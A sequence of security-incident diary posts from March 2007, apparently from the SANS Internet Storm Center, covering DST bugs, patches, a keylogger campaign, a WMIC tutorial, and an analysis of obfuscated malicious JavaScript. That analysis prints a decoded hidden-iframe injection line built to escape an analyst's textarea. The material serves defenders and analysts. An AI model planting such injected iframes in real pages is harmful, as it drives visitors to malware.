Usually, I wouldn't consider this news, but people are watching Microsoft closely today just to make sure that they don't slip up and release something prematurely (and we've received several emails about it).  Microsoft published a release candidate for Server 2003 SP2 today.  Apparently, it has been loaded into Windows Update already.  So if your server admins are feeling neglected, send them this: www.microsoft.com/technet/windowsserver/sp2.mspx


Published: 2007-03-12

MS DST Patch issue(?)

It appears that there is problem with MS DST patch.  One of our reader, Ray, notify us about MS DST patch (931836) problem.
Regarding this patch problem more information can find from here.  If you have simillar problem, please let us know.
At this moment, we didn't hear from MS yet. If we got more information, will update it.

Update :  There is another fix patch available for Windows-based applications that use the TZ environment variable may not work as expected because of changes to DST. More information available following link (http://support.microsoft.com/kb/932590/en-us)

Update : Our reader, Alan, notify us for MS Mobile Update for DST patch, the patch is available here.


Published: 2007-03-11

Yahoo mail problems

We've received e-mail from several readers (and seen ourselves) that Yahoo mail seems to be experiencing some problems.  At this point, we don't know whether or not it is related to the DST changes, but today expect just about everything to be blamed on it.  We'll update the story if we get any real details.


Published: 2007-03-11

GoDaddy is Experiencing Technical Difficulties

We were notified by one of our readers that his web sites were not resolving correctly.  It appears that Go Daddy is experiencing some difficulties and have posted a notice to that effect on their support website.  If you have problems with accessing websites today it could be that they are hosted on GoDaddy.  GoDaddy is not giving any information as to the cause of the problems or a ETA for the problem resolution. 


Thanks to Neal for notifying us.

Update :   Following news article will explain more information about GoDaddy's DST issue.

Update :  Following the GoDaddy, they had DDoS attack and the outage is not related with DST issue.


Published: 2007-03-11

Sun Alert Notification Dated March 10th, 2007

Some of you may have missed the following Alert Bulletin posted by Sun Microsystems yesterday.  It deals with the change in DST and "Olson time zone data tzdata2005r or greater incompatibility". According to the information available from Sun regarding this alert sunsolve.sun.com/search/document.do there is a problem with Eastern, Hawaii and Mountain Time Zones and Sun Java 2 software.

It appears that there are 2 issues that affect the ability for the software to calculate correctly.  Both of the issues are covered by bug reports from Sun.

Sun bug 6466476

This issue is an incompatibility in the definition of time zone objects identified by the time zone IDs "EST", "MST" or "HST". Prior to Olson data 2005r these 3 IDs refer to zones which observe daylight savings time. For Olson data 2005r or later these 3 IDs refer to zones which do not observe daylight savings time.


Sun bug 6530336

It effects the parsing of date strings containing the strings "EDT", "HDT" or "MDT", for example "July 4th 2007, 1:00 pm EDT".


Thanks to Colm for providing the information.


Published: 2007-03-11

A DST Reminder

I almost forgot, with the change in Daylight Saving Time comes a change in batteries for the smoke detectors.  Hopefully the Energizer Bunny has done a good job of manufacturing the batteries because they will have to last 3 weeks longer. 

Thanks to my fellow handler Scott for reminding me.


Published: 2007-03-11

Daylight Saving Time Change Problem With Watchguard Fireware 8.3.1 and Watchguard System Manager 8.3.1

Again, another report from Alan.  He has had problems with Watchguard products.  Here is what he had to say:

Watchguard Fireware 8.3.1 and Watchguard System Manager 8.3.1 is reporting incorrect times and symptoms.

1) Log rolls and scheduled reports advanced one hour with DST change
2) Changing the time of the scheduled log rolls and reports to the desired time results in service shutdowns - service restarts fail with an automatic stoppage of their service - the server itself must be restarted to correct the issue.
3) Webblocker updates report having occurred one hour after the Windows scheduler task reports having launched and and completed the task.

Thanks Alan for the information.


Published: 2007-03-11

Daylight Saving Time Change Issues Continue To Roll In

I can't believe that I volunteered for this shift.  The emails continue to roll in regarding things that are working quite right this morning.  Nothing earth shattering or causing the Internet to crash and burn, however it is making things a little tense for some folks.

We have now received reports of Cell Phones that are not updating. I am happy to say Long Lines Wireless did. (That is my provider as well as my employer).

We have had reports that the Atomic Clocks that we have in our homes is not updating. I can confirm that as well as mine has not updated. 

We have had reports of various VOIP phone issues with no time change.  Reports of Blackberry's and other electronic devices not updating. Reports of GPS updated devices not updating automatically. 

We will keep you updated to new items that we receive.


Published: 2007-03-11

Daylight Saving Time Change Problem With CISCO Phones

We have received reports from 2 separate people indicating the time did not change correctly on CISCO phone  Models 7940, 7960, 7961 and others.  The readers that notified us indicating that the phones  had been updated per recommendations of the vendors.   One of our readers indicated the CISCO TAC is  unreachable  due to volume so my guess is that Shawn and Peter aren't the only ones that have noticed the problem.

Shawn indicated that it appears to be a Java update problem.

Thanks to Shawn and Peter for providing us with the information.


Published: 2007-03-11

Daylight Saving Time Change Problem With Symantec Backup Exec 10d and 10.1

It appears that there is also a problem with Symantec Backup Exec 10d and 10.1.  Alan, our reader that discovered the APC problem also discovered a problem with his backup software.  Again the software was patched and updated as recommended by Symantec.

Here is what Alan had to say:

Backup jobs previously scheduled for 11:00 PM are now scheduled for 10:00 PM despite 10d and 10.1 reportedly DST compliant http://support.veritas.com/docs/286926. Nor will it allow you to change the time back to the correct time of 11:00 PM. It reports that it will, allows the change, and reports the new time in the summary when the job is resubmitted. But the scheduled time immediately reverts back to 10:00 PM. Restarting the Backup services does not appear to correct this either, so we're now an hour off on all backups and banging our heads on our desks repeating expletives directed at certain vendors.

It looks like Alan is going to have a busy Sunday and maybe even Monday. Good Luck Alan and if you have time keep us updated to your progress on resolving the problems.


Published: 2007-03-11

Daylight Saving Time Change Problem With APC

We received an email this morning from one of our readers saying that his server that was scheduled for reboot at 3:00am did not reboot. Upon investigation he discovered that the his updated and patched APC Power Management Software was the problem. 

Here is what Alan had to say:

I have a box running APC Powerchute on Windows Server 2003 SP1 that was scheduled to shutdown and restart one of my systems at 3:00 AM today but didn't do the shutdown until 4:00 AM.

According to my staff, APC had reported that earlier editions of Powerchute had a DST issue, but 7.0.5 was corrected, yet this doesn't appear to be correct. The W2K3 server did update the time correctly to the new DST at 2:00 AM this morning and is reflecting the correct Eastern DST.

Further investigation shows that what actually occurred is that the DST change altered my schedule from 3:00 AM to 4:00 AM on a permanent basis. So I was attempting to verify on the APC website that the version was actually the corrected version and that this was not an error on the part of my staff.

Since then, I have checked other W2K3 boxes with this Powerchute version and found that the change actually advanced my scheduled shutdown time by one hour rather than actually correcting DST.

So it looks like a problem exists with Powerchute.

Alan indicated that he is not able to get any information from the APC web site because they have chosen today to take the site down for maintenance. 

So those of you that are running Powerchute software may want to check you systems. 


Published: 2007-03-11

Reports of Daylight Saving Time Change Problems

Well it has started already. The reports are coming in from our readers of issues that they have identified.  I will update the diary today to let you know what our readers are experiencing.  Please do let us know of any issues that you have. Make sure that you indicate whether or not we can use the information in the diary.


Published: 2007-03-10


Although it's labeled as an alpha release -and therefore should really be handled with care- the idea behind firekeeper makes it worth mentioning now.

We all love snort: it's basically free, pretty good -if not the best- and has a huge community supporting it. Jan Wrobel took the power of snort and inserted it in a plug-in for Firefox. Resulting in an IDS/IPS inside a browser. Jan kept the ability to use Snort's rules and reused part of Snort's engine. As it is running inside the browser it even gains the ability to look inside the https traffic that's now not encrypted anymore. Add the ability to pull in the rules remotely and it looks like something we should be watching for the future.

Note that we didn't say to go ahead an install it company wide, it's an alpha release. Test it in a controlled environment and give Jan some feedback so it'll get even better.

Swa Frantzen -- NET2S


Published: 2007-03-10

DST hype

With last minute -pun intended- patches for the DST change being released in the last few days, it's now too late to panic and go about breaking more than what you'll fix.

Let's look ahead at what's likely to be going to happen if you are in or are dealing with others in an affected area:
  • Machines that got patched, including patches for applications keeping their own independent timezone information will likely work without a hick-up.
  • Home machines missing an update, or not being supported likely will end up on the wrong time, just as the rest of the house, car and phone. Users know how to update the time (well those that aren't owners of VCRs with a perpetual blinking 00:00 on it anyway). Even so, the impact of this will be mostly negligible.
  • Businesses might have meetings, conf. calls etc where participants end up turning up on the wrong time. Simple reminders and rescheduling can fix this, nothing earth shattering will happen. And if you're working in large international businesses this mess happens more often at every DST change where the different continents don't sync the changes, where the southern hemisphere changes in the other direction etc.
  • Time sensitive applications in businesses that are still using local time might go wrong. The typical applications there would be logs and access control
    • Logs: If you're used to dealing with days that don't have the 2 to 3 hour hour, or -worse- days where 2:30 happens twice, you're well equipped to deal with a log that 's one hour off. Just record when it got straightened out and you'll be fine. If you do need to make changes, out best suggestion is to get rid of local time. UTC rules, it has much less changes (a leap second is about the worst that happens and that can be automated) and it is independent of location, politicians feeling the need to mess with time, and DST changes.
    • Access control: Time based access control can be a bit more tricky but you know if after all the media attention you still don't have a plan "B" you deserve the wrath of people being mad at you for having been waiting for an hour locked out of the building. Even then it's not going not to be all that huge of an issue
  • Time critical systems. Well are you sure they are time critical if you run use local time? UTC rules here without a doubt!
That said, I'm sure many of you will enjoy fellow handler John Bambenek appearance on Comedy Central's Daily Show. Sorry about the ad in front, and it's time limited, so if you want to see it in a few months, it'll likely be a broken link.


Anyway I've posted a new poll where you can show us you crystal ball skillz. I'll replace it overnight with one where you can tell us how it went. Enjoy!

Swa Frantzen -- NET2S


Published: 2007-03-10

New malware spreading through compromised sites

Early this morning, Sanjoy wrote in that the airindia.com website contained a script-tag linking to a malicious Javascript hosted on a Chinese web server. We were able to confirm this and contacted Airindia to inform them their site had likely been compromised. At this point in time, the site is clean again.

Initial verification shows that this malicious link has been introduced into a large number of sites, both through script injection in forms as well as ways that look very much like web server compromise to us.

If you have a large installed base of Windows machines with browsing access, you may wish to review your proxy logs for requests for the following files. We removed the actual domain as to not to link directly to the actual malware.

[xxx] .cn/images/163.js
[xxx] .cn/images/sina.htm

The file downloaded upon succesful execution is called 'install.exe' and has an md5 checksum of f9fc3189d619462f6c939bfbf36c90ab. Once executed, it installs three files on the system, 'winboot.exe', 'winroot.bat' and '1.exe', of which the latter remains resident in memory. The software seems to be a keylogger at this point in time. Anti-virus detection for this malware was non-existent this morning, but AV vendors have been informed and are actively adding detection.

We're very interested in hearing more about this from you. If you notice the existence of this link on one of your sites and can provide us with more information on how the compromise occured in your instance, please let us know. This type of information could prove very helpful to other victims.

Maarten Van Horenbeeck


Published: 2007-03-09

Malformed OLE and Windows Explorer

US CERT recently published some info on a vulnerability in Windows Explorer to specifically malformed OLE objects.  Based on currently available information, this appears to be a relatively low-level DoS threat, without a code execution capability.

We've added this to our listing of "open issues" in MS products found here.


Published: 2007-03-09

Brazilian Tax Season

Just some words of warning that we're passing along from one of our friends south of the equator: It's "IRS season" in Brazil.

With the tax season deadline of April 30th approaching, any emails that you receive with "imposto de renda", "receita federal", or requests for your CPF (Brazilian SSN) is more than likely malware.

FYI, the real URLs for the Brazilian "IRS" are:


The same warning applies to US residents: be VERY wary of any email claiming to be from the IRS.  Never, EVER send any personal financial information in email.  Never, EVER trust a link in an email that claims to be from the IRS or a financial institution.  (The upshot is this: If you're going to be careless with your life savings, then let's expedite the process-- simply bundle all of the nice engraved pictures of presidents that you have in your wallet carefully together and send them to me for safekeeping... let me know when you need 'em back...)


Published: 2007-03-09

Times... they are a'changin...

We have some additional, new DST issue "stuff" coming out of Sun and IBM:


This documents an incompatibility issue with Olson TZ Data and Sun's JDK/JREs as follows:
  • JDK and JRE v1.4.2_12 and above
  • JDK and JRE 5.0u8 and above
  • JDK and JRE 6 and above
IBM is highlighting some problems caused under the newly patched JRE/JDKs that it supplied when an app uses a three-letter TZ name (like EST, CST, MST, etc...) rather than a full length designator (like "America/New York").  Details can be found here.


Published: 2007-03-09

Could it be Vista?

While the official Microsoft PR folks are denying the rumor, an unnamed source inside the software giant has indicated that the reason for Redmond's failure to publish updates in March may be caused by issues with Vista.  "Every time we try to push the updates, it keeps popping up these really beautiful, semi-transparent, shiny windows that say 'I'm sorry Dave, I'm afraid I can't do that.'," said our source. "We have no idea why it won't let us push the updates, and we don't know who 'Dave' is.  It's kind of annoying, but incredibly pretty."

[It's a joke... Lighten up and don't send me hate mail...  -TL]


Published: 2007-03-08

Over-Zealous OneCare Eats Some Outlook E-mail

There is an interesting post here and a detailed discussion here of a problem that has hit some users of Microsoft OneCare.  Apparently, OneCare has deleted some folks' Microsoft Outlook .PST file, destroying all of their e-mail.  There are some work arounds in the post which describes how to make OneCare stay away from your .PST file.  This is a problematic solution, because OneCare won't be able to scan for any malware in your .PST file, but it sure beats having all of your e-mail deleted!


Published: 2007-03-08

BackTrack 2.0 Released

A few days ago, the BackTrack 2.0 bootable Linux distribution was released.  For the uninitiated, BackTrack is a very powerful collection of penetration testing and security-related tools, all pulled together and integrated into a fantastic bootable Linux CD package, freely downloadable as an ISO image.

The new update is very well done, including Metasploit 2 and 3, better wireless support, and much more.  You can learn more about it here.


Published: 2007-03-08

No Microsoft Security Bulletins Planned for This Month

Woohoo!  Looks like you can take that vacation you were planning next week...  Microsoft announced that there are no Security Bulletins planned for next week's Microsoft patch Tuesday.  Frankly, that's kind of a relief.

On second thought... you might not want to take that vacation after all... instead of patching, you might be required to clean up some infected systems.

UPDATE: One of our readers requesting anonymity mentioned that this announcement may have been a result of the upcoming Sunday switch in some geographies to Daylight Savings Time.  This new schedule for DST may hose some software.  Microsoft might be trying to avoid negative interactions of new patches on Tuesday only two short days after DST conversion.  Interesting theory!


Published: 2007-03-08

The Grammar of WMIC

Whenever I’m Handler on Duty, I typically write up a little Windows command line tip to help security people and especially incident handlers analyze and understand their Windows systems better.  Most of these articles focus on very specific ways to use a given command, usually the very powerful WMIC command included in WinXP Pro, Win2003, and WinVista.  But, you know, quite often, people tell me, “I like to use the WMIC command in this or that specific way, but I don’t really follow the underlying syntax of the thing.”  Or, I hear, “I can never remember the overall flow of the WMIC command, so I just Google every time I need to use it to get the syntax for what I want to do.”

Remember that old saying?  “Give a man a fish, and you feed him for a day.  Teach a man to fish, and you feed him for…”  Well, you remember it.  What I’d like to do with this diary posting is to describe, in I hope an understandable and memorizable way, the overall syntax for using and exploring WMIC.  Now, you may be thinking, “Well, Microsoft provides documentation of the formal WMIC syntax here.”  You were thinking that, weren’t you?  But, that Microsoft description is rather… let me try to be charitable here… obtuse.  Let’s get practical.

For an intro and overview of WMIC, please read my earlier articles.  I don’t want to regurgitate those here.  For most of the way you’ll want to use WMIC, its practical syntax is as follows:

C:\> wmic [stuff to make it run against a remote system] [alias] [where with where clause] [verb with verb clause]

Yes, there are other variations and subtleties, but this structure is how I sort WMIC out in my own head, and how I most often use it.  Let’s dissect these components.
If you don’t include the stuff to make it run against a remote system, WMIC takes effect on the local system.  To make it run against a remote system, you would include the following as the [stuff to make it run against a remote system]:

/user:[admin_user] /password:[password] /node:[machine_name]

If you don’t provide a /password on the WMIC line, it will prompt you for one after you hit ENTER.

Next, we get to the alias.  This is the component of your system that you want WMIC to interact with, such as process, startup, os, and so on.  There are many dozens of aliases.  To get a list of them, run this:

C:\> wmic /?

After the alias, we typically include a where clause that lets us specify what we really want to look for.  WMIC with where clauses makes your whole Windows machine look like a SQL database, for which you formulate queries using WQL (the WMI Query Language, which Microsoft claims is a subset of standard SQL).  Anyway, the most common form of a where clause is:

where [attribute]=”[value]”

To get a list of attributes for a given alias to include in your where clauses, you could run this:

C:\> wmic [alias] get /?

Note also that where clauses can use ANDs and ORs, as in:

C:\> wmic process where (name=”cmd.exe” or name=”calc.exe”) list brief

This command shows you a short listing of various important attributes of all processes named cmd.exe or calc.exe.

Also, we can match substrings in a where clause with the use of like and %, as in:

C:\> wmic process where (executablepath like “%system32%") list brief

This shows you a short listing of processes running out of any directory named system32 on your box.

Then, we get to the verb clause.  There are various verbs supported.  To get a list of them, you could run:

C:\> wmic [alias] /?

Let’s look at some of the most common verbs:

list: this verb shows the value of a bunch of attributes of the given instances identified by the alias and where clause.  Whew!  That sounded like gobbledygook.  Essentially, list just lists values for specific stuff.  It’s most commonly used as “list brief” (see above), which gives you one line per instance of the things you are looking at with the most important attributes listed.  The other common use is “list full” which shows all values of all attributes of the given thing we are analyzing.  Compare:

C:\> wmic process list brief

C:\> wmic process list full

Note that I’ve omitted the where clause here to look at every process on the box.

get: get retrieves specific attribute values, from a list you can specify.  So, if you only wanted to get the processID, name, and executable path for processes named cmd.exe on your box, you would run:

C:\> wmic process where name=”cmd.exe” get processid, name, executablepath

This can be used to create customized reports.  Note that, unfortunately, the columns you get in the output are in a pre-baked alphabetical order by attribute name.  That is, the output will show executablepath first, name second, and processid third, because e comes before n, which comes before p.  That’s kind of a bummer, but you could write scripts or use a spreadsheet to manipulate this order.

delete: removes some entity from your system.  Be careful with this one, because it can really hose up your machine if you are not careful.  But, it can be used to kill processes, as in:

c:\> wmic process where name=”cmd.exe” delete

Boom!  That’ll kill all cmd.exe processes running on the box.  That technique, when used with the right name or names, can be quite helpful in killing spyware processes and bots, by the way.

call: This is the big one.  It lets you call specific methods that are supported by that alias.  These methods could let you take all kinds of useful and sometimes crazy actions on your system.  While list and get just pull data, the call verb can be used to change stuff.  To get a set of the methods supported for a given alias, you could run:

C:\> wmic [alias] call /?

As in:

C:\> wmic process call /?

C:\> wmic nicconfig call /?

There are some quite interesting methods in the process and nicconfig aliases as you can see above.  The verb clause is a set of parameters you might pass into the verb, which, for the call verb could be some parameters that the method requires, as in:

C:\> wmic process call create cmd.exe

This command calls the create method in the process alias to make a new process named cmd.exe, a new command prompt running on your box.  I’ve found this technique useful in kicking-off a background anti-virus or anti-spyware scan executable with some AV and AS products that support command-line use.

So, there you have it… by combining these various aspects, you can explore WMIC to your heart’s content.  I hope you have fun with this stuff!

--Ed Skoudis
Handler on Duty


Published: 2007-03-07

Building a remote buffer overflow for the Snort 2.6.1 DCE/RPC flaw

Every so often I get asked about buffer overflow research in practice and for once there is a lengthy, worked-out example for me to point at.

Trirat Puttaraksa recently blogged in two parts his work in turning the Snort 2.6.1 DCE/RPC flaw into a working exploit. The first part discusses the "easy bit", that is to say how to turn the vulnerability into a denial-of-service attack whereas the second part discusses how to exploit it to actually execute code.

It is a very thorough write-up, including pretty pictures explaining how he uses the Snort source code to figure out the layout of the packets he is going to send, the setup of the packets to ensure that he triggers the fault and, in part 2, how to inject the payload to execute.  The final result is that he runs calc.exe from Snort.


Published: 2007-03-06

When encoding trumps encryption (or: the latest GnuPG issue)

The latest GnuPG security advisory is, in the specific case of GnuPG, more of a "Human-Computer Interaction" than a security hole proper. The flaw is not in the encryption but in the way in which OpenPGP, a standard way of transmitting PGP-encrypted data, is interpreted by GnuPG "helpers" such as Enigmail and mail programs such as Evolution, KMail, etc.

An OpenPGP-compliant message can be made up of multiple sections, not all of which need to be signed or encrypted. The "helpers" and mail software do not use the GnuPG API correctly to interpret where the sections start and end leading to something called "injection" which is a fancy name for "adding untrusted data which is undetectable from trusted data".

Translated: you see the pretty icon telling you that the whole message is encrypted and signed whereas there is a section of it (text, image, binary, whatever) which isn't.

What if you use GnuPG "raw"? Well, the visual cues are insufficient even for an advanced user and this is why a new release of GnuPG is being distributed and relevant CVE numbers were issued.

To give you an idea of the extent of the issue here are the CVE numbers:
  • CVE-2007-1263 - for the visual distinction issues in GnuPG itself, all 4 attacks.
  • CVE-2007-1264 - Enigmail improper use of --status-fd
  • CVE-2007-1265 - KMail improper or non-existing use of --status-fd
  • CVE-2007-1266 - Evolution improper or non-existing use of --status-fd
  • CVE-2007-1267 - Sylpheed improper or non-existing use of --status-fd
  • CVE-2007-1268 - Mutt improper or non-existing use of --status-fd
  • CVE-2007-1269 - GNUMail improper or non-existing use of --status-fd
Please note that the list is not exhaustive, for example I use GPGMail for Apple's Mail.app and I am yet to test if it is vulnerable.


Published: 2007-03-06

Time for an Xb0t 360?

It was only a matter of time until someone discovered an interesting vulnerability in the Xbox 360...

So, what is the cunning plan?  Well, the designers of the Xbox 360 (which is, incidentally, PowerPC-based) went to extreme lengths to try to make it "unhackable" and chose a hypervisor design in which, unlike previous generations of gaming consoles, games no longer take over the system. There is a thin "operating system" which the games communicate with using a classic syscall ("excuse me Mr. kernel, could you please do something for me?").

Since everything goes via the syscall then, theoretically, all you need to do is armor the syscall to keep everything nice and secure.


Looks like the syscall implementation didn't adequately check the parameters being passed for correctness and consistency allowing a privilege escalation attack. As a matter of fact if you read the actual description you will notice that it is a subtle bug with one instruction in the validation path only looking at 32 bits of a 64-bit register with a subsequent instruction acting on all 64 bits.

Now for the good news:  this has been patched since January 7th 2007.

Can an Internet-connected games console be an interesting addition to the available systems for a botnet? Difficult question to answer trivially: there are many parameters to the game. 

On the one side you have low-latency high-speed DSL lines favoured by gamers but on the other side you have a totally novel operating system which you have to develop for not to mention the connection time of these systems.  What are the chances of a games console being left on 24x7 compared to a home PC on a DSL link? So we are probably back to the old story of "return on investment": is it worth my while to develop a new engine and virus to go after the Xbox 360s? Probably not, there are still plenty of Windows systems which will do just fine.

A final note: if you are technically minded the vulnerability description is very well written and a fascinating read.


Published: 2007-03-05

Comparing Anti-Virus Solutions

Every so often we get requests from readers asking us about comparisons between the different anti-virus products. These requests range from recommendations on how to compare oneself over to ready made comparison reports.


Typically we tend to use virustotal output in a lot of the diaries we write as it gives a good overview where a given malware is detected and how the different vendors named it. E.g:

Antivirus Version Update Result
AntiVir 20070305 TR/Dldr.Small.ego.55
Authentium 4.93.8 20070305 -
Avast 4.7.936.0 20070305 -
AVG 20070305 Downloader.Generic3.VCI
BitDefender 7.2 20070305 Dropped:Trojan.Rootkit.AN
CAT-QuickHeal 9.00 20070305 -
ClamAV devel-20060426 20070305 -
DrWeb 4.33 20070305 -
eSafe 20070305 Win32.Small.ego
eTrust-Vet 30.6.3455 20070305 -
Ewido 4.0 20070305 Downloader.Small.ego
F-Prot 20070304 -
F-Secure 6.70.13030.0 20070305 Trojan-Downloader.Win32.Small.ego
FileAdvisor 1 20070306 -
Fortinet 20070305 W32/Small.EGO!tr.dldr
Ikarus T3.1.1.3 20070305 Trojan-Downloader.Win32.Small.ego
Kaspersky 20070305 Trojan-Downloader.Win32.Small.ego
McAfee 4976 20070305 -
Microsoft 1.2204 20070305 -
NOD32v2 2097 20070305 Win32/Wigon.K
Norman 5.80.02 20070305 W32/DLoader.CDZC
Panda 20070305 -
PandaBeta 20070305 -
Prevx1 V2 20070306 -
SAVMail 1.0 20070302 -
Sophos 4.15.0 20070305 Troj/Agent-ECZ
Sunbelt 2.2.907.0 20070305 -
Symantec 10 20070306 -
TheHacker 20070305 -
UNA 1.83 20070305 TrojanDownloader.Win32.Small.C329
VBA32 3.11.2 20070305 Trojan-Downloader.Win32.Small.ego
VirusBuster 4.3.19:9 20070305 -

Name ccc.exe
Size 23040
md5 46241d432831fec22fd38c135ab96523
sha1 9d3dbf5c11779b4aceed2b2b2ff3735e9c483997
Date scanned 03/06/2007 00:52:27 (CET)

Obviously some vendors are absent from these results.

Virustotal keeps some limited statistics online, but they're not useful in comparing products.

Build your own

Now if you collect enough of these you might build your own statistics on which product detects things you encounter better than the competition. It's not easy to collect enough of them to get a statistically significant sample, so running 2 or more of your favorite scanners in-house might be easier to get more significant results -but more limited in scope-.

Getting enough malware to scan could be done using proxy logs, stripped email attachments etc. Do take care with local privacy rules/laws before doing this!

3rd Party Reports

There are some reports available about 3rd party testing of anti-virus products.

  • www.av-comparatives.org: updated every so often, includes a rating system.
  • www.pcworld.com: article, more than a year old.
  • www.av-test.org: runs out of a German University, not updated recently
  • www.virus.gr: last updated in August 2006
  • Consumer Reports has a comparison of 12 anti-virus products (subscribers only), it did get heavy negative feedback from the anti-virus vendors who seem not to like being put to the test.
  • Virus bulletin has a report online for registered users and is referenced by many of our readers.
  • Some more comparisons can be found at  antivirus-software.topchoicereviews.com and  www.consumersearch.com


What's important to evaluate anti-virus products on? A test with a well known fake virus to see if it is detected (eicar), just will not expose the strengths and weaknesses of the different products and allow us to make a choice. Depending on the specific situation, we can be interested in:

  • Few false positives: detecting known good software as malicious and crippling systems as a result has happened before, the impact of recovering from this should not be underestimated. While looking forward is hard, the hindsight view might tell it's own tale
  • Few false negatives: not detecting malware is a bad thing, but it does happen by default in a technology that is basically reactive and where those creating the malware actually test their contraptions against the anti-virus products to make sure they are not detected at the time they release them.
  • Timely signature updates: signature updates is the main vector anti-virus software uses to fix the above problems. The faster they are released the more protection you get as a customer.
  • In corporate settings we want excellent centralized management. This should at least include a report that points us to individual machines not updating their definitions at all or in a timely manner. Ideally it does this without blocking signature updates when the roaming laptops are not connected to the corporate network or a VPN back to the office.
  • Few vulnerabilities: Vulnerabilities in our security solutions are somewhat of a nightmare as they not only fail in their goal of making us more secure but also introduce more security problems.
  • We do want variety if possible so that we use different engines in the different roles by e.g. using a different vendor on our email infrastructure and the desktops. The same goes for desktops and file servers.
  • Ease of use.
  • Price
  • ...

With thanks to epablo, Vincent,  Bryan, William, and many others for contributing to this diary

Swa Frantzen -- NET2S



Published: 2007-03-05

Security update for QuickTime (7.1.5)

Apple released a new version of QuickTime (7.1.5) which contains numerous bug fixes and a lot of important security patches. This article (http://docs.info.apple.com/article.html?artnum=305149) lists the security content of this release – you can see that it fixes 8 security vulnerabilities, all of which just require a user to click on a specially crafted file.

If you use QuickTime I would definitely recommend that you install the update as soon as possible as some of those security vulnerabilities look nasty.

You can find the Mac version at http://www.apple.com/quicktime/download/mac.html, while the Windows version can be downloaded from http://www.apple.com/quicktime/download/win.html.


Published: 2007-03-05

phpMyFAQ being exploited

A vulnerability in phpMyFAQ, which is an open source FAQ system for PHP and various databases, has been published back in February (http://www.phpmyfaq.de/advisory_2007-02-18.php).
Jeremy notified us that this is being exploited in the wild. The vulnerability allows an attacker to upload arbitrary files on the server. As you can probably guess, currently attackers first upload a php shell, after which the machine is typically turned into a spam spitting server.

If you are using phpMyFAQ, be sure to install the updates available on their web site (http://www.phpmyfaq.de/).


Published: 2007-03-05

JavaScript traps for analysts

On Friday, Lorna posted a diary (http://isc.sans.org/diary.html?storyid=2325) about some malware we received that day. A compromised site hosted an obfuscated JavaScript program – a typical scenario you might say.
Over the weekend I received couple of e-mails from our readers asking how to deobfuscate that JavaScript so I spent more time analyzing it and I found some very interesting details and traps that are almost directly related to the nice diary Daniel posted couple of weeks ago (http://isc.sans.org/diary.html?storyid=2268).

If you haven’t read Daniel’s diary I recommend you definitely do so. Daniel showed 4 typical methods that you can use when analyzing obfuscated JavaScript programs. As you will see, of those 4 methods, 3 will fail on this example!

The JavaScript file that we will analyze is nicely obfuscated, as you can see below:

Malicious JavaScript program

As most of similar obfuscation attempts, first a function is defined, called OAEC86 (as you will see, absolutely all variables have similar names which makes them more difficult to read for a human). At the end, that function is called with a big string as the input parameter (the obfuscated content).

Replacing document.write() with alert()

So, we have to analyze what the OAEC86 function does. As you can see on the screenshot above, the function ends with a call to document.write() which causes your browser to execute the (deobfuscated) code. If you try to approach this with method 1 from Daniel’s diary (replace document.write() calls with alert()), and start the JavaScript program, your browser will appear to hang and you will have to kill it with Task Manager. We will see later why did that happen, but let’s analyze the function itself first.

As the code has been stripped down of spaces, it’s difficult to analyze so I added some spaces and tabs to make it more human readable. There is one interesting variable that gets declared immediately at the beginning of the function:

var A112FA=arguments.callee.toString().replace(/\W/g,"").toUpperCase();

When I saw this I immediately remembered another diary I wrote some time ago (http://isc.sans.org/diary.html?storyid=1519), when I analyzed a similar thing, but this one goes a bit further.
So, the variable above gets its content from the arguments.callee.toString() call. This function returns back a text string which contains the whole called function, from the first line to the last one. A thing I found before was that there was a big difference between Internet Explorer and Mozilla in handling of white space, however, as you can see in the example above, that doesn’t matter as all non-word characters are stripped out with the replace() call (\W) and then converted to upper case. It's nice to see how attackers fixed this so it works correctly (from their point of view) in both IE and Mozilla.
So, after executing this call, the variable A112FA will contain the following string: “FUNCTION0AEC86T1F0AVARA112FA…”. You can see the beginning part of the code here.

As you can probably guess at this point in time, the function actually uses itself to deobfuscate the content. This way the author made sure that you can not change the function. However, this still doesn’t explain why the browser hangs when you change the the document.write() call to alert(). The answer lies further down.

Without analyzing every line of the code (that’s left as an exercise for you, if you are interested in this area), I’ll just explain why the browser hangs.
The big for loop in the code performs various permutations which deobfuscate the code. There is a while() loop in the code as well, which loops until the Q3A988 variable is different from zero. Now, when you change the document.write() call to alert() it will also cause this while() loop to keep looping (as Q3A988 will never have zero) which will in turn cause your browser to hang.
So the first method from the original diary is a no go here. Lets try with the second method.

Beware of </textarea>

Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>

What does this do? It closes the <textarea> tag that you might have put before. In other words, if you were running this in your browser and you used method 2) you would actually execute the malicious code! It is obvious that author of this code came prepared for analysts!

Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.

Defeating the obfuscation

One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/blog/blog.php?BlogID=98, it’s a nice read that I definitely recommend.

I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just must make sure that you have JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:

D:> java –classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js

This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this as that will allow you to set breakpoints easier – and as we’ve seen, in this case you can do it as the deobfuscation function will strip out white spaces.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:

Rhino JavaScript Debugger

You can see that it contains the code that would have been executed in the browser.

